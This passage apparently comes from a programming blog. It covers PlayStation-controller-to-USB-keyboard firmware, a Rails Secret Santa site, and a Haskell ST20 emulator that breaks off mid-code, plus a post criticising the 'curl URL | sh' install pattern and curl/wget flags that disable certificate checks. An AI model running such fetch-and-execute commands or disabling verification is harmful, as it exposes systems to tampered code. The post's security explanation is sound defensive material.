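   how many there are. A 0 bit means that the button is pressed. */
static size_t pressed_keys(uint16_t state, const char *names[14])
{
    size_t n = 0;
    for (int bit = 0; bit < 16; bit++) {
        if (psx_keys[bit] != NULL && !(state & (1u << bit)))
            names[n++] = psx_keys[bit];
    }
    return n;
}
```

For instance, data1 = 0xFF and data2 = 0xDF give the state 0xDFFF, where only bit 13 (Circle) is cleared.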

At first, it was not obvious how to debug the implementation of this protocol. Fortunately, this microcontroller has a USB port and it is possible to transmit debug messages using the usb_debug_only code sample from the manufacturer.

Unsurprisingly, my first iteration did not work and printed the following.

01 -> FF
42 -> FF
00 -> FF
00 -> FF
00 -> FF

I re-read my code carefully and I found two bugs:

I was not putting Clock back up.

I was using PORTC for reading input even though PINC was needed… the registers are mapped in memory but not at the same address for reading and writing. Rookie mistake.

After reprogramming and reloading I saw a satisfying output:

01 -> FF
42 -> 41
00 -> 5A
00 -> FF
00 -> DF

The output bytes correspond to the device ID part (41 5A) and a value (FF DF) that indicates that nothing is pressed except the Circle button.

Interfacing with the computer

At that moment the firmware just computes the result and prints it over USB. To do something useful with it on the computer side, this information needs to be exposed as a USB joystick or keyboard. I used the usb_keyboard code sample which exports a usb_keyboard_press function.

It was necessary to slightly alter the main loop: in a debug setting it is possible to print the state at every frame, but a keyboard works differently. You are supposed to send a message only when a key is pressed. So, at each frame, it is necessary to keep track of the previous state and to diff it with the current one. If a bit was previously set (meaning that the button was not pressed) and is now cleared, the USB code has to be notified that a key was pressed. This code is run for every button btn if the state changes:

int was_released = last_js & (1 << btn);
int is_pressed = !(js & (1 << btn));
if (was_released && is_pressed) {
    int key = mapping[btn];
    usb_keyboard_press(key, 0);
}
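The per-button test can also be done for all buttons at once with bit masks, since the state is active low: a bit that goes from 1 to 0 is a press, and a bit that goes from 0 to 1 is a release. A sketch with made-up helper names:

```c
#include <stdint.h>

/* Bits set in the result: buttons that were released and are now pressed. */
static uint16_t newly_pressed(uint16_t last_js, uint16_t js)
{
    return (uint16_t)(last_js & ~js);
}

/* Bits set in the result: buttons that were pressed and are now released. */
static uint16_t newly_released(uint16_t last_js, uint16_t js)
{
    return (uint16_t)(~last_js & js);
}
```

The firmware could then loop over the set bits of newly_pressed(last_js, js) and notify the USB code for each of them.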

This is simple, yet it works quite well and is enough to play Stepmania!

However, I noticed that it does not work perfectly, since the key is released immediately: this is a problem for DDR since the patterns where you have to hold keys do not work.

Let’s have a look at this function from the library:

int8_t usb_keyboard_press(uint8_t key, uint8_t modifier)
{
    int8_t r;
    keyboard_modifier_keys = modifier;
    keyboard_keys[0] = key;
    r = usb_keyboard_send();
    if (r) return r;
    keyboard_modifier_keys = 0;
    keyboard_keys[0] = 0;
    return usb_keyboard_send();
}

When usb_keyboard_send is called, it transmits the contents of keyboard_keys over USB. All nonzero elements correspond to keys that are pressed. So what this function does is transmit a state where a key is pressed, then transmit a state where nothing is pressed.

This has two limitations:

it does not separate key press from key release;

it does not work if several keys are pressed at once.

Making rollover work

It would be nice to implement n-key rollover (NKRO) so that all keys can be pressed independently. This is possible, by increasing the size of keyboard_keys to 14 (the number of keys on a Playstation gamepad). But this means fiddling with the USB descriptor code, so that the USB host side can know how many bytes to expect, and I am not really comfortable with that.

In the library, the size of keyboard_keys is 6, so I stuck with 6-key rollover which ought to be enough for everybody.

Here is the new version of the code that is called for every button:

int was_pressed = !(last_js & (1 << i));
int is_pressed = !(js & (1 << i));
if (is_pressed && !was_pressed) {
    keypress_add(mapping[i]);
}
if (was_pressed && !is_pressed) {
    keypress_remove(mapping[i]);
}

The keypress_add function walks the keyboard_keys array and replaces the first 0 with the correct button. keypress_remove does the opposite.
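Here is a minimal sketch of what these two functions could look like. It is not the code from the repository: the keys array stands in for the library’s keyboard_keys, and returning -1 when all six slots are taken is an assumption of this sketch. In the firmware, each change would be followed by a call to usb_keyboard_send() to transmit the new state.

```c
#include <stdint.h>

#define KEY_SLOTS 6   /* size of keyboard_keys in the library */

/* Stand-in for keyboard_keys (assumption of this sketch). */
static uint8_t keys[KEY_SLOTS];

/* Put `key` in the first free (zero) slot. Returns 0 on success,
   -1 if all slots are taken (the key is then dropped). */
static int keypress_add(uint8_t key)
{
    for (int i = 0; i < KEY_SLOTS; i++) {
        if (keys[i] == 0) {
            keys[i] = key;
            return 0;
        }
    }
    return -1;
}

/* Clear the slot holding `key`, if any. */
static void keypress_remove(uint8_t key)
{
    for (int i = 0; i < KEY_SLOTS; i++) {
        if (keys[i] == key)
            keys[i] = 0;
    }
}
```

Freed slots are reused by the next press, so the order of keys in the array does not matter to the host.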

And… this works! I found this very refreshing to write low-level code for an existing, documented protocol. If you are interested, all the code can be found in this github repository. Thanks for reading!

Protected by 1N4148 diodes.↩︎

On the curl | sh pattern

Etienne Millon — Sat, 27 Dec 2014 00:00:00 UT

Like many, I noticed a common pattern in the past few years: software authors publishing instructions to download and install their program from their website, directly in the terminal, through a variant of curl URL | sh.

Since I think that it should be considered bad practice, I created a tumblr called “curl | sh” which lists occurrences of this pattern.

I would like to address some of the criticism I received about this list. Most came from Hacker News, where it was posted.

“If the URL starts with HTTPS, it is secure”

The websites I post here fall roughly into three categories:

downloads over HTTP.

downloads over HTTPS with certificate verification deactivated (curl -k/--insecure, wget --no-check-certificate).

downloads over HTTPS.

Type 1 downloads are the most insecure ones, since it is possible to change the original response from the server without the client noticing. Modifying traffic like this is very easy, for example on wifi hotspots. This is not something that happens only in hacker movies: some places use this to insert ads in web pages.

Type 2 downloads are a bit better since the content is encrypted, but encryption without authentication is mostly useless since you do not know who you are talking to. The client will connect to anything that responds to url:443, which means that it is still possible to spoof a connection and actively change the response. To the client, an encrypted connection to an attacker looks the same as an encrypted connection to the legit site.

Type 3 downloads prevent this because they require that the certificate presented by the server matches the server name and is signed by a trusted Certificate Authority (CA). This means that the certificate has been handed to the person in charge of the website.

This is not foolproof either because the client has to trust a list of root CAs. This can be a problem for example in corporate environments, where the company can add their own CA to this list of trusted roots. At every HTTPS connection, they can create on the fly a certificate that is signed by themselves and with the correct server name. In other words, they can vouch for the identity of any website. As a consequence, they are able to spoof the TLS connection, in the same way that it is possible for type 2 downloads. Having a rogue trusted root is almost the same as disabling certificate checking since it is able to create correct certificates for any site.

A way to mitigate this problem is to enable certificate pinning, which alerts the user when the certificate presented by a website has changed since the last time they consulted it. But this is not a perfect solution, since there are legitimate reasons to change a certificate. For example, they are usually limited in time, and every year or so it is necessary to generate a new one. However, if a website presents a certificate with a different anchor than before, this may mean that the connection is being spoofed.

Note that the main reason people disable certificate checking (i.e., use type 2 instead of type 3) is that they use self-signed certificates. These are certificates that are not signed by a CA. They are free and simpler to set up, but they do not authenticate the server, so clients reject them by default. In browsers, this usually results in a big scary warning, and in a yellow or open lock instead of the green, closed lock that we have all been taught to trust. It is however possible to pin them, so it is better than plain HTTP. The effort required to spoof a self-signed certificate is also greater than to spoof plain HTTP, but both are reasonably easy.

“apt-get install $pkg does the same thing”

Not exactly. When you install a package from the Debian archive, the .deb file is authenticated by a digital signature: the archive's index files are signed, and they list a cryptographic hash for every package. This signature is checked against a key that is present on all Debian systems. You obtain it at install time from the CD, but you can easily get it from another trusted Debian system if you cannot trust a CD for some reason. The key here (pun intended) is that this scheme authenticates files, not connections.

For example, if an HTTPS website is compromised, you will not be able to detect that the files have been modified on the server (and thus curl | sh will work as before). But if your local Debian mirror is compromised, the files you download will fail to validate against the key that is on your computer.
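The difference between authenticating connections and authenticating files can be sketched in a few lines of Python. Roughly speaking, apt checks a signature on the archive's Release file, which lists hashes of the Packages indexes, which in turn list a hash for each .deb. The sketch below only models that last step: it assumes the `manifest` dictionary (file name to SHA-256 hex digest) comes from an index whose signature has already been verified, and `verify_file` is a hypothetical name. Where the bytes were downloaded from does not matter.

```python
import hashlib

def verify_file(name: str, data: bytes, manifest: dict) -> bool:
    """Check downloaded bytes against a trusted manifest (hypothetical helper).

    `manifest` maps file names to SHA-256 hex digests and is assumed to
    come from an index whose signature has already been checked.
    """
    expected = manifest.get(name)
    if expected is None:
        return False  # unknown file: refuse it
    return hashlib.sha256(data).hexdigest() == expected
```

A compromised mirror can serve any bytes it wants, but it cannot make them match the hash listed in a signed index.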

Of course, a signature from the Debian archive signing key does not automatically ensure that the package will not delete your root filesystem. But it ensures that the software has not been tampered with since its maintainer uploaded it. Also, since it goes through a distribution, you can expect that some quality assurance has been done there.

It is hard to distribute software securely. Protecting the connection is definitely a first step, but protecting the files themselves is better. Fortunately, it is possible to go further, for example with reproducible builds. I highly encourage everyone to read the triangle of secure code delivery, which describes what it takes to deliver programs securely.

In the meantime, feel free to send me more examples of this pattern so that I can publish them. Get in touch either directly on curl | sh, on twitter or by email (see the footer below). Thanks for reading!

Santa made me learn Rails in a week

Etienne Millon — Fri, 03 Apr 2015 00:00:00 UT

Abstract: I released Secret Santa Creator, a free website to organize events where every participant gives a gift to another, randomly chosen participant. To build it, I learnt Ruby on Rails in a week and it was awesome. As usual, I put the source on GitHub.

Every year I take part in a Secret Santa: within a group of friends, everyone has a “target” to whom they have to give a gift.

There are several ways to organize this. The simplest one is to have everyone put their name in a hat, shuffle everything, and have everyone pick one name. But to do that, you need to get everyone in the same room before the event, and that is not always convenient. Another possibility is to ask someone to pick the names, but then that person will know who has to give a gift to them.

So last year, I decided to script this. I wrote a small Python script that takes a list of names and emails, shuffles them and sends an email to each participant. It worked well. Technically, I could have found out who was supposed to give me a gift by looking at my mail logs, but short of sophisticated cryptographic protocols, you have to trust the organizer not to cheat anyway.
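The core of such a script fits in a few lines. This is not the original script, just a sketch of one reasonable approach: shuffle the participants and have each one give a gift to the next person in the shuffled order, wrapping around at the end. Unlike drawing names from a hat, this never assigns someone to themselves. The function name `assign_targets` is hypothetical, names are assumed to be distinct, and sending the emails is left out.

```python
import random

def assign_targets(names, rng=random):
    """Map each participant to the person they give a gift to.

    Shuffles a copy of `names`, then pairs each person with the next one
    in the shuffled list (the last one wraps around to the first).
    """
    if len(names) < 2:
        raise ValueError("need at least two participants")
    order = list(names)
    rng.shuffle(order)
    return {giver: order[(i + 1) % len(order)] for i, giver in enumerate(order)}
```

Because the result is always a single cycle, nobody is ever their own target, but the draw is not uniform over all valid assignments: for example, with four people, two pairs exchanging gifts with each other can never happen.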

In a way, this was a good MVP, but it was not very reusable. Indeed, some friends asked me for the program so that they could use it with other friends, but I could not expect everybody to have Python and sendmail installed on their machines. It turns out that many websites already offer this service, so I ended up pointing them to those.

This year, I was asked again how to organize a Secret Santa, so I figured, why not build a website? It had the potential to be directly useful to my friends, so I jumped in. Plus, it was a good excuse to learn new technologies. I gave myself one week to learn Ruby on Rails, code the website and deploy it on Heroku. That is what the cool kids do, right?

My web stack of choice usually revolves around Flask, which is simple and powerful but does not do a lot of things out of the box. That is one of the strengths of this microframework, but I wanted to try something more integrated. Django would have been a good choice too, but I was curious about Ruby on Rails and the Ruby ecosystem in general.

I had bookmarked the Ruby on Rails Tutorial by Michael Hartl, which seemed a good resource. Indeed, it is very nice: it seems up to date and emphasizes not only the code but also how to deploy a project, or even how to keep it under source control. When you learn a new technology, it is not obvious which files should be checked in. If you had asked me before, I would probably have kept Gemfile.lock out of git.

The book pins particular versions of the different gems, so everything has been tested and works flawlessly. At first I was afraid I would have to use rvm, which I had heard does not work too well. I prefer using a Ruby interpreter provided by my distribution, but I am OK with using third-party gems. That is my policy for Python too: I use a system Python and a virtualenv for each project. Ruby’s bundler seems to support the same workflow.

I was very pleased by the first chapter of the book, which explains how to write a minimal Rails site and immediately deploy it to Heroku. I found it astonishing that absolutely zero configuration was needed to do that. This is partly thanks to Rails’ Convention over Configuration philosophy and partly because Heroku supports Rails apps out of the box.

By contrast, to deploy a Flask app these days on a server I control, I have to write an Ansible playbook. Mostly copy & pasted from previous projects but still, the friction is incomparable. This is not specific to Rails though, so I may use Heroku for Python one-off projects too now.

The rest of the book focuses on creating a microblog site, first using the scaffold technique and then by hand.

I liked that there is a lot of structure in Rails applications: everything has a “correct place” and concerns are clearly separated. Even tests are automatically separated into different folders. Also, I did not create a single .rb file by hand; everything was created by rails generate. This is the sweet spot between having to do everything by hand and coding in an IDE.

As for the Ruby language itself, I figured that I would learn it on the fly since it is similar enough to Python. That worked out well.

I like the :symbols a lot; they remind me of Lisp. They make a clear distinction between strings used as keys and strings that are meant to be printed. I am not a fan of the colon syntax itself, especially when symbols are mixed with hashes (k: :v), but syntax highlighting helps in that case, of course.

The concrete syntax is a bit weird. I like the explicit end, but I am still not sure whether whitespace is significant. The same goes for expressions: it is a bit unclear when parentheses are needed. I think that it works the same way as in CoffeeScript. I hope that it is not ambiguous and that bugs arising from it are rare.

That should be covered by tests anyway. The book encourages writing a lot of tests, which is quite nice. The testing ecosystem is interesting, particularly minitest and guard, which make TDD very easy. Guard is a bit too aggressive when selecting which tests to rerun, so it will sometimes skip tests that should have been run. This is probably just a matter of writing a better Guardfile.

Anyway, I went through chapters 1 to 9 and it was enough to get a good grasp of how to code a Rails site.

The website I wanted to write would work like this:

go to the homepage;

create a new event;

fill in info: names, emails, constraints;

click send;

emails are sent.

It is actually a bit more complicated since it also handles editing, but overall it is a very simple website. With the Rails Tutorial almost done, I had enough to build it. Secret Santa Creator is even simpler than the tutorial app, since it does not require authentication. I built it mostly using Test-Driven Development, as in the tutorial.

The hardest part was definitely creating nested forms. Every event has a list of participants, and a list of constraints. It is thus necessary to create a form that can edit this list structure, by directly editing participants or constraints from the “edit event” form, but also removing or adding some.

I found the cocoon gem, which works fine for this and let me build this kind of form.

To send email in my Python MVP script, I just piped messages to sendmail. Fortunately, Ruby on Rails has an integrated system for this, Action Mailer. You just need to set up the SMTP configuration and run rails generate mailer, and boom, you can send emails. Heroku has an add-on for SendGrid with a reasonable free tier, so I used that.

Coding the actual website took approximately two days. It is possible to be that fast only because Rails insists that easy tasks should become no-brainers.

You can see the site here and the source on Github.

It works reasonably well, barring a few quirks in the UI. I used it myself to organize several events this year, and a couple of friends did the same. I would call that a success! I plan to work a bit more on it at the end of the year and try to get a few more users. I am curious to see how it goes!

A lens-based ST20 emulator

Etienne Millon — Thu, 20 Aug 2015 00:00:00 UT

Every year, as part of the SSTIC conference, there is a forensics/reverse engineering challenge. I participated in the 2015 edition. Though I did not manage to complete it, I made an emulator for the exotic ST20 architecture, which is probably worth describing here.

Note that this emulator is not really optimized for speed. During the challenge, I actually had to rewrite the relevant code as pure Haskell (i.e., removing the emulation layer) so that it ran faster. Rather, the goal of this article is to show a few techniques to write powerful emulators in Haskell.

{-# LANGUAGE GeneralizedNewtypeDeriving #-}
{-# LANGUAGE Rank2Types #-}
{-# LANGUAGE TemplateHaskell #-}

import Control.Applicative
import Control.Concurrent
import Control.Monad -- for `when`; recent mtl versions no longer re-export it
import Control.Monad.RWS
import Control.Lens hiding (imap, op)
import Data.Bits
import Data.Int
import Data.Maybe
import Data.Word
import Numeric
import System.Exit
import System.IO
import Text.Printf

import qualified Data.ByteString as BS
import qualified Data.Map as M
import qualified Data.Set as S

The evaluation monad

This program uses Template Haskell to define lenses, so unfortunately we need to start with a few type definitions.

The ST20 uses signed addresses, so its memory goes from 0x80000000 (the most negative 32-bit value) up to 0x7fffffff:

type Address = Int32

We’ll represent the memory using a map. Its performance is surprisingly close to that of an array. It is possible to significantly speed up memory access by using an IOUArray, but then loads and stores become monadic operations, which makes it impossible to use lenses.

type Mem = M.Map Address Word8

As we’ll see, transputers (hardware threads) can communicate with each other. We’ll be able to connect a channel either to another transputer or to a tty.

data IChannel = InChan (Chan Word8) | InHandle Handle
data OChannel = OutChan (Chan Word8) | OutHandle Handle

type IChannelMap = [(Int32, IChannel)]
type OChannelMap = [(Int32, OChannel)]

All evaluations take place in an Eval monad, which is a monad transformer stack with the following capabilities:

read and write an EvalState value;

read an EvalEnv value;

do some I/O.

newtype Eval a = Eval (RWST EvalEnv () EvalState IO a)
  deriving ( Functor
           , Applicative -- superclass of Monad since GHC 7.10
           , Monad
           , MonadIO
           , MonadReader EvalEnv
           , MonadState EvalState
           )

data EvalEnv = EvalEnv
  { envInChans :: IChannelMap
  , envOutChans :: OChannelMap
  }

data EvalState = EvalState
  { _iptr :: !Address
  , _intStack :: [Int32]
  , _wptr :: !Int32
  , _mem :: !Mem
  }

$(makeLenses ''EvalState)

runEval :: Mem -> IChannelMap -> OChannelMap -> Eval a -> IO a
runEval memory imap omap (Eval m) =
  fst <$> evalRWST m env st
  where
    env = EvalEnv imap omap
    st = EvalState
      { _iptr = memStart
      , _intStack = []
      , _wptr = 0xaaaaaaaa
      , _mem = memory
      }

The above $(...) is a Template Haskell splice. It creates lenses based on the record declaration of EvalState. Lenses are a very powerful tool that makes it possible to compose record reads and updates in a functional way. Here, it defines a lens for each record field; for example, the splice expands to a top-level declaration iptr :: Lens' EvalState Address. But we will define our own lenses too, and everything will remain composable.

Memory

This representation is naturally suited to byte access:

memByteOpt :: Address -> Lens' EvalState (Maybe Word8)
memByteOpt addr = mem . at addr

See? We composed the mem lens (between an evaluation state and a memory state) with at addr, which is a lens between a memory state and the value at address addr. Well, not exactly: at actually returns a Maybe Word8. We will assume that all memory accesses will succeed, so we want a lens that returns a plain Word8. To achieve this, we can compose with a lens that treats Maybe a as a container of a:

maybeLens :: Lens' (Maybe a) a
maybeLens = lens fromJust (const Just)

memByte :: Address -> Lens' EvalState Word8
memByte addr = memByteOpt addr . maybeLens

Sometimes we will also need to access memory word by word. To achieve that, we first define conversion functions.

bytesToWord :: (Word8, Word8, Word8, Word8) -> Int32
bytesToWord (b0, b1, b2, b3) =
  sum [ fromIntegral b0
      , fromIntegral b1 `shiftL` 8
      , fromIntegral b2 `shiftL` 16
      , fromIntegral b3 `shiftL` 24
      ]

wordToBytes :: Int32 -> (Word8, Word8, Word8, Word8)
wordToBytes w = (b0, b1, b2, b3)
  where
    b0 = fromIntegral $ w .&. 0x000000ff
    b1 = fromIntegral $ (w .&. 0x0000ff00) `shiftR` 8
    b2 = fromIntegral $ (w .&. 0x00ff0000) `shiftR` 16
    b3 = fromIntegral $ (w .&. 0xff000000) `shiftR` 24
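The byte order used here is little-endian: the least significant byte lives at the lowest address. A quick way to convince oneself that the two conversion functions are inverses is to mirror them in Python and compare against the standard `struct` module, whose `"<i"` format means little-endian signed 32-bit. The function names below simply mirror the Haskell ones; this is an illustration, not part of the emulator.

```python
import struct

def word_to_bytes(w: int) -> tuple:
    """Split a signed 32-bit value into 4 bytes, least significant first."""
    u = w & 0xFFFFFFFF  # two's complement view of the word
    return tuple((u >> (8 * i)) & 0xFF for i in range(4))

def bytes_to_word(bs: tuple) -> int:
    """Reassemble 4 little-endian bytes into a signed 32-bit value."""
    u = sum(b << (8 * i) for i, b in enumerate(bs))
    return u - (1 << 32) if u & 0x80000000 else u
```

For instance, `word_to_bytes(0x12345678)` gives `(0x78, 0x56, 0x34, 0x12)`.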

Then, we can define a lens focusing on a 32-bit value.

compose :: [a -> a] -> a -> a
compose = foldr (.) id

get32 :: Address -> EvalState -> Int32
get32 base s = bytesToWord (b0, b1, b2, b3)
  where
    b0 = s ^. memByte base
    b1 = s ^. memByte (base + 1)
    b2 = s ^. memByte (base + 2)
    b3 = s ^. memByte (base + 3)

set32 :: Address -> EvalState -> Int32 -> EvalState
set32 base s v =
  compose [ set (memByte base) b0
          , set (memByte (base + 1)) b1
          , set (memByte (base + 2)) b2
          , set (memByte (base + 3)) b3
          ] s
  where
    (b0, b1, b2, b3) = wordToBytes v

memWord :: Address -> Lens' EvalState Int32
memWord addr = lens (get32 addr) (set32 addr)

The instruction set reference defines a handy operator to shift an address by a word offset:

(@@) :: Address -> Int32 -> Address
a @@ n = a + 4 * n

It will also be handy to access the memory in list chunks:

mem8s :: Address -> Int32 -> Lens' EvalState [Word8]
mem8s base len = lens getList setList
  where
    getList s =
      map (\ off -> s ^. memByte (base + off)) [0 .. len - 1]
    setList s0 ws =
      compose (zipWith (\ off w -> set (memByte (base + off)) w) [0..] ws) s0

Instruction decoding

Instructions are usually encoded on a single byte: the opcode is in the high nibble, and a parameter is in the low one. For example, this is how an LDC (load constant) is encoded:

  .--- 0x40 LDC
  |.-- 0x5
  ||
0x45   LDC 0x5

This only works for 4-bit constants (0 to 15). To load bigger constants, there is a “prefix” operation that shifts the current operand left by 4 bits:

  .-------- 0x20 PFX
  |.------- 0x2
  ||
  ||   .--- 0x40 LDC
  ||   |.-- 0x5
  ||   ||
0x22 0x45   LDC 0x25

Those are chainable; for example 0x21 0x22 0x45 encodes LDC 0x125.

Another prefix complements the current operand value, then shifts it:

  .-------- 0x60 NFX
  |.------- 0x2
  ||
  ||   .--- 0x40 LDC
  ||   |.-- 0x5
  ||   ||
0x62 0x45   LDC ((~0x2 << 4) + 0x5), i.e. LDC -43

The ST20 architecture actually provides two types of instructions:

“primary” instructions such as LDC, whose operand is encoded directly.

“secondary” instructions such as MINT (equivalent to LDC 0x80000000). They take no operand. In fact, they are a special case of the first type: they use the primary opcode OPR, whose operand n selects the secondary instruction. For example, MINT is OPR 0x42, which is encoded as 0x24 0xF2.
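The prefix arithmetic is easy to get wrong, so here is a small Python model of it, mirroring `decodeInstr_`: each byte contributes its low nibble to an accumulator; PFX then shifts it left by 4, NFX complements it and then shifts it, and any other function code ends the instruction. The names `decode` and `PRIMARY` are hypothetical, the function-code table is taken from the decoder below, and Python integers are truncated to 32 bits by hand to imitate `Int32`.

```python
# Function codes (high nibble), as used by the decoder in this article.
PRIMARY = {
    0x0: "J", 0x1: "LDLP", 0x2: "PFX", 0x3: "LDNL", 0x4: "LDC",
    0x5: "LDNLP", 0x6: "NFX", 0x7: "LDL", 0x8: "ADC", 0x9: "CALL",
    0xA: "CJ", 0xB: "AJW", 0xC: "EQC", 0xD: "STL", 0xE: "STNL", 0xF: "OPR",
}

def to_int32(x: int) -> int:
    """Wrap a Python integer to a signed 32-bit value."""
    x &= 0xFFFFFFFF
    return x - (1 << 32) if x & 0x80000000 else x

def decode(code: bytes, pos: int = 0):
    """Decode one instruction starting at `pos`.

    Returns (mnemonic, operand, next_pos). For secondary instructions the
    mnemonic is "OPR" and the operand selects the actual operation.
    """
    acc = 0
    while True:
        b = code[pos]
        pos += 1
        fn, nibble = b >> 4, b & 0xF
        acc = to_int32(acc | nibble)  # low nibble of acc is always 0 here
        if PRIMARY[fn] == "PFX":
            acc = to_int32(acc << 4)
        elif PRIMARY[fn] == "NFX":
            acc = to_int32(~acc << 4)
        else:
            return PRIMARY[fn], acc, pos
```

With this model, `decode(bytes([0x21, 0x22, 0x45]))` yields `("LDC", 0x125, 3)`, and `decode(bytes([0x24, 0xF2]))` yields `("OPR", 0x42, 2)`, that is MINT.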

We know enough to draft an instruction decoder.

data PInstr = AJW | ADC | LDC | STL | LDL | LDNL | LDLP | LDNLP
            | CJ | J | EQC | CALL | STNL
  deriving (Eq, Ord, Show)

data SInstr = PROD | MINT | GAJW | LDPI | OUT | IN | LB | XOR | SB | BSUB
            | SSUB | DUP | GTx | WSUB | AND | RET | GCALL | SHR | SHL | REM
  deriving (Eq, Ord, Show)

data Instr = Pri PInstr Int32
           | Sec SInstr
  deriving (Eq, Ord)

instance Show Instr where
  show (Pri p n) = show p ++ " " ++ show n
  show (Sec s) = show s

Instruction decoding will need to move within the instruction stream, so it is part of the evaluation monad.

decodeInstr :: Eval Instr
decodeInstr = decodeInstr_ 0

decodeInstr_ :: Int32 -> Eval Instr
decodeInstr_ acc = do
  b <- peekAndIncr
  let acc' = acc + fromIntegral (b .&. 0xf)
  case () of
    _ | b <= 0x0f -> return $ Pri J acc'
    _ | b <= 0x1f -> return $ Pri LDLP acc'
    _ | b <= 0x2f -> decodeInstr_ $ acc' `shiftL` 4            -- PFX
    _ | b <= 0x3f -> return $ Pri LDNL acc'
    _ | b <= 0x4f -> return $ Pri LDC acc'
    _ | b <= 0x5f -> return $ Pri LDNLP acc'
    _ | b <= 0x6f -> decodeInstr_ $ complement acc' `shiftL` 4 -- NFX
    _ | b <= 0x7f -> return $ Pri LDL acc'
    _ | b <= 0x8f -> return $ Pri ADC acc'
    _ | b <= 0x9f -> return $ Pri CALL acc'
    _ | b <= 0xaf -> return $ Pri CJ acc'
    _ | b <= 0xbf -> return $ Pri AJW acc'
    _ | b <= 0xcf -> return $ Pri EQC acc'
    _ | b <= 0xdf -> return $ Pri STL acc'
    _ | b <= 0xef -> return $ Pri STNL acc'
    _ -> return $ Sec $ parseSecondary acc'                     -- OPR

-- Read the byte at the instruction pointer and advance it.
peekAndIncr :: Eval Word8
peekAndIncr = do
  addr <- use iptr
  b <- use (memByte addr)
  iptr += 1
  return b

parseSecondary :: Int32 -> SInstr
parseSecondary 0x01 = LB
parseSecondary 0x02 = BSUB
parseSecondary 0x06 = GCALL
parseSecondary 0x07 = IN
parseSecondary 0x08 = PROD
parseSecondary 0x09 = GTx
parseSecondary 0x0a = WSUB
parseSecondary 0x0b = OUT
parseSecondary 0x1b = LDPI
parseSecondary 0x1f = REM
parseSecondary 0x20 = RET
parseSecondary 0x33 = XOR
parseSecondary 0x3b = SB
parseSecondary 0x3c = GAJW
parseSecondary 0x40 = SHR
parseSecondary 0x41 = SHL
parseSecondary 0x42 = MINT
parseSecondary 0x46 = AND
parseSecondary 0x5a = DUP
parseSecondary 0xc1 = SSUB
parseSecondary b = error $ "Unknown secondary 0x" ++ showHex b ""

The two stacks

Data is manipulated using two different mechanisms: the integer stack and the workspace.

The integer stack is a set of three registers, A, B, and C, which behave as a stack: they can only be manipulated through push and pop operations, so we represent them as a list.

The instruction set reference says that an undefined value will be popped if the stack is empty; here we assume that this never happens, and allow a partial pattern match.

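pushInt :: Int32 -> Eval ()
pushInt n = intStack %= (n:)

popInt :: Eval Int32
popInt = do
  stack <- use intStack
  -- Partial on purpose: assumes the stack is never empty. A lazy `let`
  -- pattern avoids requiring a MonadFail instance for Eval.
  let (h:t) = stack
  intStack .= t
  return h

popAll :: Eval (Int32, Int32, Int32)
popAll = do
  a <- popInt
  b <- popInt
  c <- popInt
  return (a, b, c)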

Only the head (A) can be directly accessed, so we first define a lens between a list and its head, and compose it with intStack.

headLens :: Lens' [a] a
headLens = lens head $ \ l x -> x : tail l

areg :: Lens' EvalState Int32
areg = intStack . headLens

The workspace is a place in memory (pointed to by a register wptr) where local variables can be stored and loaded, a bit like a stack pointer. We first define push and pop operations.

pushWorkspace :: Int32 -> Eval ()
pushWorkspace value = do
  wptr -= 4
  var 0 .= value

popWorkspace :: Eval Int32
popWorkspace = do
  w <- use $ var 0
  wptr += 4
  return w

Then we define a lens to focus on a variable.

var :: Int32 -> Lens' EvalState Int32
var n = lens getVar setVar
  where
    varLens s = memWord ((s ^. wptr) @@ n)
    getVar s = s ^. varLens s
    setVar s v = set (varLens s) v s
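The workspace is just memory addressed relative to `wptr`, so it can be modelled with a plain dictionary of bytes. This Python sketch (the class and method names are hypothetical) mirrors `var`, `pushWorkspace` and `popWorkspace`: variable n lives at wptr + 4·n, pushing moves `wptr` down by one word before storing, and popping reads slot 0 before moving `wptr` back up. Unlike the Haskell version, unmapped addresses read as zero here.

```python
class Workspace:
    """Byte-addressed memory plus a workspace pointer (hypothetical model)."""

    def __init__(self, wptr: int):
        self.mem = {}  # address -> byte; missing addresses read as 0
        self.wptr = wptr

    def _addr(self, n: int) -> int:
        return self.wptr + 4 * n  # same as wptr @@ n

    def get_var(self, n: int) -> int:
        base = self._addr(n)
        u = sum(self.mem.get(base + i, 0) << (8 * i) for i in range(4))
        return u - (1 << 32) if u & 0x80000000 else u  # signed 32-bit

    def set_var(self, n: int, value: int) -> None:
        base = self._addr(n)
        u = value & 0xFFFFFFFF
        for i in range(4):  # little-endian, like memWord
            self.mem[base + i] = (u >> (8 * i)) & 0xFF

    def push(self, value: int) -> None:
        self.wptr -= 4
        self.set_var(0, value)

    def pop(self) -> int:
        value = self.get_var(0)
        self.wptr += 4
        return value
```

After two pushes, the most recent value is variable 0 and the previous one is variable 1, which is how CALL leaves its saved registers for the callee.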

Input and output

The main particularity of the ST20 architecture is its hardware support for message channels. They map fairly naturally to Control.Concurrent.Chan channels. Each ST20 thread has a map from channel numbers to input or output channels:

getXChan :: (EvalEnv -> [(Int32, a)]) -> Int32 -> EvalEnv -> a
getXChan member w st = fromJust $ lookup w $ member st

getIChan :: Int32 -> EvalEnv -> IChannel
getIChan = getXChan envInChans

getOChan :: Int32 -> EvalEnv -> OChannel
getOChan = getXChan envOutChans

And these channels can be either a Chan Word8 or a plain Handle, to connect a thread to the process’ standard input and output.

readFromIChan :: IChannel -> Int32 -> Eval [Word8]
readFromIChan (InChan chan) n =
  liftIO $ mapM (\ _ -> readChan chan) [1..n]
readFromIChan (InHandle h) n = liftIO $ do
  bs <- BS.hGet h $ fromIntegral n
  return $ BS.unpack bs

writeToOChan :: OChannel -> [Word8] -> Eval ()
writeToOChan (OutChan chan) ws = liftIO $ writeList2Chan chan ws
writeToOChan (OutHandle h) ws = liftIO $ do
  BS.hPutStr h $ BS.pack ws
  hFlush h

A few combinators

We first define a few combinators that will help us define the interpret function.

Pop two operands, and push the result:

liftOp :: (Int32 -> Int32 -> Int32) -> Eval ()
liftOp op = do
  a <- popInt
  b <- popInt
  pushInt $ op a b

Exchange two registers:

xchg :: Lens' EvalState Int32 -> Lens' EvalState Int32 -> Eval ()
xchg l1 l2 = do
  x1 <- use l1
  x2 <- use l2
  l1 .= x2
  l2 .= x1

Convert a boolean to an integer:

fromBool :: Bool -> Int32
fromBool False = 0
fromBool True = 1

The interpret function

The core of the interpreter is the following function. It takes an instruction and transforms it into a monadic action in Eval.

interpret :: Instr -> Eval ()

Some cases are very simple.

interpret (Pri AJW n) = wptr += 4 * n
interpret (Pri LDNLP n) = areg += 4 * n
interpret (Pri J n) = iptr += n
interpret (Pri LDC n) = pushInt n
interpret (Sec MINT) = pushInt 0x80000000
